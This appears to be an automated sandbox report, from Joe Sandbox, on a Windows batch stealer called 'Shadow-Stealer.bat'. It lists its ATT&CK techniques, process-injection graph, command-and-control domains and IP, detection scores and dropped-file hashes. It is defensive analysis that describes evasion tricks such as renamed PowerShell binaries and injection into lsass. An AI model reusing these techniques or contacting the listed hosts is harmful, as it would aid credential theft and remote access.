            Source: C:\Windows\$sxr-powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\$sxr-powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\$sxr-mshta.exeCode function: 10_2_000001ACE9011540 cpuid 10_2_000001ACE9011540
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: C:\Windows\$sxr-mshta.exeCode function: 10_2_000001ACEA2D7AE0 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,10_2_000001ACEA2D7AE0
            Source: C:\Windows\System32\dllhost.exeCode function: 20_2_000000014000165C CreateNamedPipeW,20_2_000000014000165C
            Source: C:\Windows\$sxr-mshta.exeCode function: 10_2_00007FF64E1D1008 GetVersion,GetModuleHandleW,GetProcAddress,LoadLibraryW,GetProcAddress,FreeLibrary,RegOpenKeyExA,RegQueryValueExA,ExpandEnvironmentStringsA,LoadLibraryA,RegCloseKey,GetModuleHandleW,GetProcAddress,MultiByteToWideChar,UnregisterApplicationRestart,GetProcAddress,FreeLibrary,RegCloseKey,10_2_00007FF64E1D1008

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: Process Memory Space: $sxr-powershell.exe PID: 6400, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: Process Memory Space: $sxr-powershell.exe PID: 6400, type: MEMORYSTR
            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpactResource DevelopmentReconnaissance
            1
            Valid Accounts
            1
            Windows Management Instrumentation
            1
            DLL Side-Loading
            1
            DLL Side-Loading
            1
            Disable or Modify Tools
            11
            Input Capture
            1
            System Time Discovery
            Remote Services1
            Archive Collected Data
            Exfiltration Over Other Network Medium1
            Encrypted Channel
            Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationAbuse Accessibility FeaturesAcquire InfrastructureGather Victim Identity Information
            Default Accounts1
            Scripting
            1
            Valid Accounts
            1
            Valid Accounts
            1
            Deobfuscate/Decode Files or Information
            LSASS Memory3
            File and Directory Discovery
            Remote Desktop Protocol1
            Email Collection
            Exfiltration Over Bluetooth1
            Non-Standard Port
            SIM Card SwapObtain Device Cloud BackupsNetwork Denial of ServiceDomainsCredentials
            Domain Accounts2
            Native API
            1
            Scheduled Task/Job
            11
            Access Token Manipulation
            1
            Scripting
            Security Account Manager37
            System Information Discovery
            SMB/Windows Admin Shares11
            Input Capture
            Automated Exfiltration1
            Non-Application Layer Protocol
            Data Encrypted for ImpactDNS ServerEmail Addresses
            Local Accounts21
            Command and Scripting Interpreter
            Login Hook413
            Process Injection
            1
            Obfuscated Files or Information
            NTDS1
            Query Registry
            Distributed Component Object ModelInput CaptureTraffic Duplication1
            Application Layer Protocol
            Data DestructionVirtual Private ServerEmployee Names
            Cloud Accounts1
            Scheduled Task/Job
            Network Logon Script1
            Scheduled Task/Job
            3
            Software Packing
            LSA Secrets31
            Security Software Discovery
            SSHKeyloggingScheduled TransferFallback ChannelsData Encrypted for ImpactServerGather Victim Network Information
            Replication Through Removable Media31
            PowerShell
            RC ScriptsRC Scripts1
            Timestomp
            Cached Domain Credentials2
            Process Discovery
            VNCGUI Input CaptureData Transfer Size LimitsMultiband CommunicationService StopBotnetDomain Properties
            External Remote ServicesSystemd TimersStartup ItemsStartup Items1
            DLL Side-Loading
            DCSync41
            Virtualization/Sandbox Evasion
            Windows Remote ManagementWeb Portal CaptureExfiltration Over C2 ChannelCommonly Used PortInhibit System RecoveryWeb ServicesDNS
            Drive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            File Deletion
            Proc Filesystem1
            Application Window Discovery
            Cloud ServicesCredential API HookingExfiltration Over Alternative ProtocolApplication Layer ProtocolDefacementServerlessNetwork Trust Dependencies
            Exploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt121
            Masquerading
            /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedExfiltration Over Symmetric Encrypted Non-C2 ProtocolWeb ProtocolsInternal DefacementMalvertisingNetwork Topology
            Supply Chain CompromisePowerShellCronCron1
            Valid Accounts
            Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingExfiltration Over Asymmetric Encrypted Non-C2 ProtocolFile Transfer ProtocolsExternal DefacementCompromise InfrastructureIP Addresses
            Compromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd41
            Virtualization/Sandbox Evasion
            Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingExfiltration Over Unencrypted Non-C2 ProtocolMail ProtocolsFirmware CorruptionDomainsNetwork Security Appliances
            Compromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task11
            Access Token Manipulation
            KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureExfiltration Over Physical MediumDNSResource HijackingDNS ServerGather Victim Org Information
            Compromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers413
            Process Injection
            GUI Input CapturePermission Groups DiscoveryReplication Through Removable MediaEmail CollectionExfiltration over USBProxyNetwork Denial of ServiceVirtual Private ServerDetermine Physical Locations
            Trusted RelationshipVisual BasicContainer Orchestration JobContainer Orchestration Job1
            Hidden Files and Directories
            Web Portal CaptureLocal GroupsComponent Object Model and Distributed COMLocal Email CollectionCommonly Used PortInternal ProxyDirect Network FloodServerBusiness Relationships
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1352637 Sample: Shadow-Stealer.bat Startdate: 03/12/2023 Architecture: WINDOWS Score: 100 91 throbbing-mountain-09011.pktriot.net 2->91 93 eu-central-7075.packetriot.net 2->93 117 Multi AV Scanner detection for domain / URL 2->117 119 Malicious sample detected (through community Yara rule) 2->119 121 Detected unpacking (creates a PE file in dynamic memory) 2->121 123 6 other signatures 2->123 12 $sxr-mshta.exe 1 2->12         started        15 cmd.exe 2 2->15         started        signatures3 process4 file5 143 Drops executables to the windows directory (C:\Windows) and starts them 12->143 18 $sxr-cmd.exe 1 12->18         started        89 C:\Users\user\...\Shadow-Stealer.bat.exe, PE32+ 15->89 dropped 145 Renames powershell.exe to bypass HIPS 15->145 21 Shadow-Stealer.bat.exe 4 21 15->21         started        24 conhost.exe 15->24         started        signatures6 process7 file8 103 Suspicious powershell command line found 18->103 105 Very long command line found 18->105 107 Bypasses PowerShell execution policy 18->107 26 $sxr-powershell.exe 13 18->26         started        30 conhost.exe 18->30         started        83 C:\Windows\$sxr-powershell.exe, PE32+ 21->83 dropped 85 C:\Windows\$sxr-mshta.exe, PE32+ 21->85 dropped 87 C:\Windows\$sxr-cmd.exe, PE32+ 21->87 dropped 109 Deletes itself after installation 21->109 111 Writes to foreign memory regions 21->111 113 Modifies the context of a thread in another process (thread injection) 21->113 115 3 other signatures 21->115 32 dllhost.exe 21->32         started        34 dllhost.exe 21->34         started        36 dllhost.exe 21->36         started        38 dllhost.exe 21->38         started        signatures9 process10 dnsIp11 95 eu-central-7075.packetriot.net 167.71.56.116, 22112, 49716, 49725 DIGITALOCEAN-ASNUS United States 26->95 135 Suspicious powershell command line found 26->135 137 Very long command line found 26->137 139 Drops executables to the windows directory (C:\Windows) and starts them 26->139 141 8 other signatures 26->141 40 dllhost.exe 26->40         started        43 dllhost.exe 26->43         started        45 dllhost.exe 26->45         started        47 7 other processes 26->47 signatures12 process13 signatures14 127 Writes to foreign memory regions 40->127 129 Creates a thread in another existing process (thread injection) 40->129 131 Injects a PE file into a foreign processes 40->131 49 winlogon.exe 40->49 injected 51 lsass.exe 40->51 injected 54 svchost.exe 40->54 injected 56 dwm.exe 40->56 injected 58 cscript.exe 43->58 injected 60 WmiPrvSE.exe 43->60 injected 62 yApVCRtJPjQJu.exe 45->62 injected 133 Powershell is started from unusual location (likely to bypass HIPS) 47->133 process15 signatures16 64 dllhost.exe 49->64         started        67 dllhost.exe 49->67         started        69 dllhost.exe 49->69         started        71 dllhost.exe 49->71         started        125 Writes to foreign memory regions 51->125 process17 signatures18 97 Writes to foreign memory regions 64->97 99 Creates a thread in another existing process (thread injection) 64->99 101 Injects a PE file into a foreign processes 64->101 73 svchost.exe 64->73 injected 75 svchost.exe 64->75 injected 77 svchost.exe 64->77 injected 79 svchost.exe 67->79 injected 81 svchost.exe 69->81 injected process19

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            Shadow-Stealer.bat0%ReversingLabs
            Shadow-Stealer.bat0%VirustotalBrowse
            SourceDetectionScannerLabelLink
            C:\Users\user\Desktop\Shadow-Stealer.bat.exe0%ReversingLabs
            C:\Users\user\Desktop\Shadow-Stealer.bat.exe0%VirustotalBrowse
            C:\Windows\$sxr-cmd.exe0%ReversingLabs
            C:\Windows\$sxr-cmd.exe0%VirustotalBrowse
            C:\Windows\$sxr-mshta.exe0%ReversingLabs
            C:\Windows\$sxr-mshta.exe0%VirustotalBrowse
            C:\Windows\$sxr-powershell.exe0%ReversingLabs
            C:\Windows\$sxr-powershell.exe0%VirustotalBrowse
            No Antivirus matches
            SourceDetectionScannerLabelLink
            eu-central-7075.packetriot.net16%VirustotalBrowse
            throbbing-mountain-09011.pktriot.net2%VirustotalBrowse
            SourceDetectionScannerLabelLink
            http://www.microsoft.0%URL Reputationsafe
            http://james.newtonking.com/projects/json0%URL Reputationsafe
            http://james.newtonking.com/projects/json0%URL Reputationsafe
            http://crl.micros0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            eu-central-7075.packetriot.net
            167.71.56.116
            truetrueunknown
            throbbing-mountain-09011.pktriot.net
            unknown
            unknowntrueunknown
            NameSourceMaliciousAntivirus DetectionReputation
            http://schemas.xmlsoap.org/ws/2005/07/securitypolicylsass.exe, 00000018.00000000.2485644679.000002D6F064E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.3361372135.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.3361810056.000002D6F064E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2485626357.000002D6F062F000.00000004.00000001.00020000.00000000.sdmpfalse
              high
              http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702lsass.exe, 00000018.00000002.3361372135.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2485626357.000002D6F062F000.00000004.00000001.00020000.00000000.sdmpfalse
                high
                https://stackoverflow.com/q/14436606/23354$sxr-powershell.exe, 0000000F.00000002.3389530773.000001FABCFF5000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  http://schemas.xmlsoap.org/ws/2004/09/policylsass.exe, 00000018.00000002.3361372135.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2485626357.000002D6F062F000.00000004.00000001.00020000.00000000.sdmpfalse
                    high
                    http://schemas.xmlsoap.org/wsdl/ertieslsass.exe, 00000018.00000002.3361372135.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2485626357.000002D6F062F000.00000004.00000001.00020000.00000000.sdmpfalse
                      high
                      http://schemas.xmlsoap.org/wsdl/soap12/lsass.exe, 00000018.00000002.3361372135.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2485626357.000002D6F062F000.00000004.00000001.00020000.00000000.sdmpfalse
                        high
                        http://schemas.xmlsoap.org/wsdl/lsass.exe, 00000018.00000002.3361372135.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2485626357.000002D6F062F000.00000004.00000001.00020000.00000000.sdmpfalse
                          high
                          https://www.newtonsoft.com/jsonschema$sxr-powershell.exe, 0000000F.00000002.3570248897.000001FACCBC9000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://schemas.xmlsoap.org/wsdl/soap12/Plsass.exe, 00000018.00000002.3361372135.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2485626357.000002D6F062F000.00000004.00000001.00020000.00000000.sdmpfalse
                              high
                              https://www.newtonsoft.com/json$sxr-powershell.exe, 0000000F.00000002.3570248897.000001FACCBC9000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://www.nuget.org/packages/Newtonsoft.Json.Bson$sxr-powershell.exe, 0000000F.00000002.3570248897.000001FACCBC9000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://www.microsoft.lsass.exe, 00000018.00000002.3362525625.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2485686627.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, cscript.exe, 0000001C.00000002.3371306184.0000000002F17000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 0000001C.00000000.2515366668.0000000002F17000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://aka.ms/pscore6$sxr-powershell.exe, 00000013.00000002.3357613110.000001F58004F000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://schemas.xmlsoap.org/ws/2005/02/trustlsass.exe, 00000018.00000002.3361372135.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2485626357.000002D6F062F000.00000004.00000001.00020000.00000000.sdmpfalse
                                      high
                                      https://aka.ms/pscore68$sxr-powershell.exe, 0000000F.00000002.3389530773.000001FABC7D1000.00000004.00000800.00020000.00000000.sdmp, $sxr-powershell.exe, 00000013.00000002.3357613110.000001F580074000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://docs.oasis-open.org/ws-sx/ws-trust/200512lsass.exe, 00000018.00000000.2485644679.000002D6F064E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.3361810056.000002D6F064E000.00000004.00000001.00020000.00000000.sdmpfalse
                                          high
                                          http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdlsass.exe, 00000018.00000002.3361372135.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2485626357.000002D6F062F000.00000004.00000001.00020000.00000000.sdmpfalse
                                            high
                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name$sxr-powershell.exe, 0000000F.00000002.3389530773.000001FABC7D1000.00000004.00000800.00020000.00000000.sdmp, $sxr-powershell.exe, 00000013.00000002.3357613110.000001F58009C000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://james.newtonking.com/projects/json$sxr-powershell.exe, 0000000F.00000002.3570248897.000001FACCBC9000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              https://github.com/JamesNK/Newtonsoft.Json$sxr-powershell.exe, 0000000F.00000002.3570248897.000001FACCBC9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://crl.microscscript.exe, 0000001C.00000002.3371306184.0000000002F17000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 0000001C.00000000.2515366668.0000000002F17000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs
                                                IPDomainCountryFlagASNASN NameMalicious
                                                167.71.56.116
                                                eu-central-7075.packetriot.netUnited States
                                                14061DIGITALOCEAN-ASNUStrue
                                                Joe Sandbox Version:38.0.0 Ammolite
                                                Analysis ID:1352637
                                                Start date and time:2023-12-03 16:33:58 +01:00
                                                Joe Sandbox Product:CloudBasic
                                                Overall analysis duration:0h 10m 58s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                Number of analysed new started processes analysed:32
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:12
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Sample file name:Shadow-Stealer.bat
                                                Detection:MAL
                                                Classification:mal100.troj.spyw.evad.winBAT@52/13@1/1
                                                EGA Information:
                                                • Successful, ratio: 100%
                                                HCA Information:
                                                • Successful, ratio: 98%
                                                • Number of executed functions: 90
                                                • Number of non-executed functions: 277
                                                Cookbook Comments:
                                                • Found application associated with file extension: .bat
                                                • Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                • Not all processes where analyzed, report is missing behavior information
                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                • Report size getting too big, too many NtSetInformationFile calls found.
                                                TimeTypeDescription
                                                16:34:54API Interceptor34x Sleep call for process: Shadow-Stealer.bat.exe modified
                                                16:35:14API Interceptor13371x Sleep call for process: $sxr-powershell.exe modified
                                                16:35:57API Interceptor123591x Sleep call for process: winlogon.exe modified
                                                16:35:59API Interceptor113697x Sleep call for process: dwm.exe modified
                                                16:35:59API Interceptor88254x Sleep call for process: lsass.exe modified
                                                16:35:59API Interceptor654x Sleep call for process: svchost.exe modified
                                                16:36:02API Interceptor83x Sleep call for process: cscript.exe modified
                                                16:36:03API Interceptor78x Sleep call for process: WmiPrvSE.exe modified
                                                16:36:04API Interceptor63x Sleep call for process: yApVCRtJPjQJu.exe modified
                                                16:36:05API Interceptor220x Sleep call for process: conhost.exe modified
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                167.71.56.116OvA6x5v34G.exeGet hashmaliciousAsyncRATBrowse
                                                  zUYpYikG7T.exeGet hashmaliciousnjRatBrowse
                                                    SdwkQEBnc3.exeGet hashmaliciousNanocoreBrowse
                                                      riV1K85Awe.exeGet hashmaliciousNanocoreBrowse
                                                        Malwarebytes Gears.exeGet hashmaliciousAsyncRATBrowse
                                                          H8RZSly6dG.exeGet hashmaliciousNjratBrowse
                                                            8E8732B9BEBC8382E938B48697E79FEB4B06528DF41FD.exeGet hashmaliciousnjRatBrowse
                                                              qCotr6jZt2.exeGet hashmaliciousnjRatBrowse
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                eu-central-7075.packetriot.netOvA6x5v34G.exeGet hashmaliciousAsyncRATBrowse
                                                                • 167.71.56.116
                                                                zUYpYikG7T.exeGet hashmaliciousnjRatBrowse
                                                                • 167.71.56.116
                                                                SdwkQEBnc3.exeGet hashmaliciousNanocoreBrowse
                                                                • 167.71.56.116
                                                                riV1K85Awe.exeGet hashmaliciousNanocoreBrowse
                                                                • 167.71.56.116
                                                                Malwarebytes Gears.exeGet hashmaliciousAsyncRATBrowse
                                                                • 167.71.56.116
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                DIGITALOCEAN-ASNUS76IbxcfOQf.exeGet hashmaliciousLokibotBrowse
                                                                • 178.128.238.137
                                                                file.exeGet hashmaliciousRedLine, SmokeLoader, StealcBrowse
                                                                • 37.139.22.180
                                                                file.exeGet hashmaliciousRedLine, SmokeLoaderBrowse
                                                                • 37.139.22.180
                                                                REQUEST FOR 01-DEC 2023.exeGet hashmaliciousFormBookBrowse
                                                                • 64.225.91.73
                                                                Altogether.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                • 64.225.91.73
                                                                Plyshaar.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                • 64.225.91.73
                                                                SecuriteInfo.com.Win32.PWSX-gen.16993.11761.exeGet hashmaliciousLokibotBrowse
                                                                • 178.128.238.137
                                                                SecuriteInfo.com.Win32.PWSX-gen.1907.2567.exeGet hashmaliciousLokibotBrowse
                                                                • 178.128.238.137
                                                                file.exeGet hashmaliciousRedLine, SmokeLoaderBrowse
                                                                • 165.227.156.49
                                                                DocScan 105811-26.exeGet hashmaliciousFormBookBrowse
                                                                • 64.225.91.73
                                                                m2jngcTeBu.elfGet hashmaliciousMiraiBrowse
                                                                • 162.243.214.175
                                                                DocScan 814-1125-2023.exeGet hashmaliciousFormBookBrowse
                                                                • 64.225.91.73
                                                                https://login.logggiondocuumennnt.click/?username=cew@smrw.comGet hashmaliciousHTMLPhisherBrowse
                                                                • 188.166.83.143
                                                                tHRIRkYRbE.elfGet hashmaliciousMiraiBrowse
                                                                • 138.68.169.154
                                                                file.exeGet hashmaliciousRedLine, SmokeLoaderBrowse
                                                                • 67.205.189.1
                                                                file.exeGet hashmaliciousRedLine, SmokeLoaderBrowse
                                                                • 142.93.169.197
                                                                http://192.241.199.70Get hashmaliciousUnknownBrowse
                                                                • 192.241.199.70
                                                                file.exeGet hashmaliciousBitCoin Miner, RedLine, SmokeLoaderBrowse
                                                                • 165.22.196.27
                                                                file.exeGet hashmaliciousRedLine, SmokeLoaderBrowse
                                                                • 68.183.34.12
                                                                malfor-cw-sample.exeGet hashmaliciousUnknownBrowse
                                                                • 167.99.88.222
                                                                No context
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                C:\Users\user\Desktop\Shadow-Stealer.bat.exetrafik_yenilme.batGet hashmaliciousRemcos, zgRATBrowse
                                                                  a.batGet hashmaliciousAgniane Stealer, zgRATBrowse
                                                                    Rune_Launcher.batGet hashmaliciousQuasarBrowse
                                                                      SCO_23.batGet hashmaliciouszgRATBrowse
                                                                        IMG_690B23.docx.batGet hashmaliciousAgentTeslaBrowse
                                                                          Qtagiietkyb.png.batGet hashmaliciousStrela StealerBrowse
                                                                            IMG_690B23.batGet hashmaliciousAgentTesla, zgRATBrowse
                                                                              SecuriteInfo.com.Win64.DropperX-gen.31402.22171.exeGet hashmaliciousUnknownBrowse
                                                                                SecuriteInfo.com.Win64.DropperX-gen.31402.22171.exeGet hashmaliciousUnknownBrowse
                                                                                  345d.cmdGet hashmaliciousUnknownBrowse
                                                                                    file.exeGet hashmaliciousUnknownBrowse
                                                                                      file.exeGet hashmaliciousUnknownBrowse
                                                                                        PingOptimizerMain.batGet hashmaliciousQuasarBrowse
                                                                                          crack.batGet hashmaliciousUnknownBrowse
                                                                                            da49aae4ea90792e9f5497dcd2c4fa8cf7bb98a23b2d846ab985facf.batGet hashmaliciousQuasarBrowse
                                                                                              Final_rooming_list.batGet hashmaliciousBlackshades, QuasarBrowse
                                                                                                RE_432-7784.jsGet hashmaliciousUnknownBrowse
                                                                                                  FA150623.pdf.batGet hashmaliciousAgentTeslaBrowse
                                                                                                    Uni.batGet hashmaliciousUnknownBrowse
                                                                                                      update_SC.batGet hashmaliciousUnknownBrowse
                                                                                                        Process:C:\Users\user\Desktop\Shadow-Stealer.bat.exe
                                                                                                        File Type:CSV text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):3603
                                                                                                        Entropy (8bit):5.364531743127414
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:iqbYqGSI6o9xYsntpDxqKkWqmq1ftzHNYrKaq7mSRIzQ09wmj0qD:iqbYqGcQtpDxqKkWqmq1ftzHuLqdIzQk
                                                                                                        MD5:CB025951AB11BC9879660B66AB48A871
                                                                                                        SHA1:539153A3469E5EA91A5700944F0CC3547C32AE21
                                                                                                        SHA-256:057D8F2026B51CBB81516E9A8DDE433D4AEBE1FF6E22D1CB60A742E1EA899367
                                                                                                        SHA-512:E7095F21D3765FBC7E5F4E97C2CC37A8E56802D5AE7CAE1276BE62E096AF1B06B8B31B83CF7B475D6BE3D82186772B95ADB45A68A84AD060EDCCA3154B4CE6F9
                                                                                                        Malicious:false
                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.PowerShell.ConsoleHost, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pb378ec07#\0827b790b8e74d0d12643297a812ae07\Microsoft.PowerShell.ConsoleHost.ni.dll",0..3,"System.Management.Automation, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\27947b366dfb4feddb2be787d72ca90d\System.Management.Automation.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d5
                                                                                                        Process:C:\Users\user\Desktop\Shadow-Stealer.bat.exe
                                                                                                        File Type:data
                                                                                                        Category:modified
                                                                                                        Size (bytes):11608
                                                                                                        Entropy (8bit):4.887486353364779
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:I9sm73YrKkDp5hVsm5eml89smFp5IiMDOmEN3H+OHgFqxoeRM3YrKkDVsm5emlpj:HPYmiQ0HzAFItib4Mib4WVoGIpN6KQkT
                                                                                                        MD5:69E9F3FAAEAC92E92B26596DBA884D3B
                                                                                                        SHA1:02A87F2EAD0B9DC6202372D370B4D58D025B7CB2
                                                                                                        SHA-256:F2453CFAB4FB2EB61E0E4DD4BAF35E926BE43E0C8E36569A3A325E605316B321
                                                                                                        SHA-512:BD0EEF728D260D0BD217B507DC217BB96FA0C069FA872E6D5C8805B922ED81D9F0528AC1EE775F0BC1B1BB666FCE7B170385E5AE229A55D0D4FFF2AC936524FF
                                                                                                        Malicious:false
                                                                                                        Preview:PSMODULECACHE..........z..I...C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psm1........SafeGetCommand........Get-ScriptBlockScope....$...Get-DictionaryValueFromFirstKeyFound........New-PesterOption........Invoke-Pester........ResolveTestScripts........Set-ScriptBlockScope........-.l..z..a...C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Unregister-PackageSource........Save-Package........Install-PackageProvider........Find-PackageProvider........Install-Package........Get-PackageProvider........Get-Package........Uninstall-Package........Set-PackageSource........Get-PackageSource........Find-Package........Register-PackageSource........Import-PackageProvider.............z..I...C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........AfterEa
                                                                                                        Process:C:\Users\user\Desktop\Shadow-Stealer.bat.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):64
                                                                                                        Entropy (8bit):1.1940658735648508
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:NlllulltP/XZ:NllU
                                                                                                        MD5:F4FD6F7F8DDC8D2716B5AE289B93BDCE
                                                                                                        SHA1:F48B3E013E3536DB71FED89B5786847E3951C767
                                                                                                        SHA-256:84EDE900B5623435AF6CC6C8266F751A2BF95CBF19E9B12C63178A389A3472C0
                                                                                                        SHA-512:B7C830C41152C07E30DDA334F0B0F2CEF9632074FE87958680B490CC6A650145536D33178E2E744AAC2303014A4C243C3DAA5E44261291DC853C977911FFBB09
                                                                                                        Malicious:false
                                                                                                        Preview:@...e.................................4.*............@..........
                                                                                                        Process:C:\Users\user\Desktop\Shadow-Stealer.bat.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                        Process:C:\Windows\$sxr-powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
